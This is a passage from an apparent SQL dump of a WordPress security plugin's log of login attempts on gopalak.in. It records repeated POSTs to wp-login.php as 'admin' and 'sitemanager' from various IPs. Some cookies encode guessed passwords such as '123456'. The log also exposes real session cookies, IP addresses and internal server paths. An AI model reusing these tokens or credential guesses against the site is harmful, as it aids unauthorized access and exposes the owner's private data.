Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34956\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.232.143\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744971614.779563;s:12:\"REQUEST_TIME\";i:1744971614;}}','103.90.232.143',0,'2025-04-18 15:50:16','1970-01-01 00:00:00'),(93793,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39540\";s:11:\"REMOTE_ADDR\";s:14:\"142.44.191.239\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744972291.300957;s:12:\"REQUEST_TIME\";i:1744972291;}}','142.44.191.239',0,'2025-04-18 16:01:33','1970-01-01 00:00:00'),(93794,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42552\";s:11:\"REMOTE_ADDR\";s:14:\"134.209.104.76\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744972974.7312529;s:12:\"REQUEST_TIME\";i:1744972974;}}','134.209.104.76',0,'2025-04-18 16:12:56','1970-01-01 00:00:00'),(93795,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60670\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.37\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744973660.5797081;s:12:\"REQUEST_TIME\";i:1744973660;}}','198.54.114.37',0,'2025-04-18 16:24:22','1970-01-01 00:00:00'),(93796,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55020\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.125.232\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744974352.6173379;s:12:\"REQUEST_TIME\";i:1744974352;}}','198.54.125.232',0,'2025-04-18 16:35:55','1970-01-01 00:00:00'),(93797,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51692\";s:11:\"REMOTE_ADDR\";s:11:\"185.2.4.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744975044.172647;s:12:\"REQUEST_TIME\";i:1744975044;}}','185.2.4.103',0,'2025-04-18 16:47:25','1970-01-01 00:00:00'),(93798,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"78\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:254:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"78\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744975612.321146;s:12:\"REQUEST_TIME\";i:1744975612;}}','146.59.227.21',1,'2025-04-18 16:56:53','2025-04-18 17:07:01'),(93799,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"77\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:288:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; _wptn=c2l0ZW1hbmFnZXI7YWRtaW4%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"77\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744975614.1352389;s:12:\"REQUEST_TIME\";i:1744975614;}}','146.59.227.21',1,'2025-04-18 16:56:55','2025-04-18 17:07:01'),(93800,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:290:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; _wptn=c2l0ZW1hbmFnZXI7cGFzcw%3D%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744975615.944062;s:12:\"REQUEST_TIME\";i:1744975615;}}','146.59.227.21',1,'2025-04-18 16:56:57','2025-04-18 17:07:01'),(93801,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"81\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; _wptn=c2l0ZW1hbmFnZXI7MTIzNDU2\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"81\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744975617.7580919;s:12:\"REQUEST_TIME\";i:1744975617;}}','146.59.227.21',1,'2025-04-18 16:56:59','2025-04-18 17:07:01'),(93802,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"82\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:292:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; 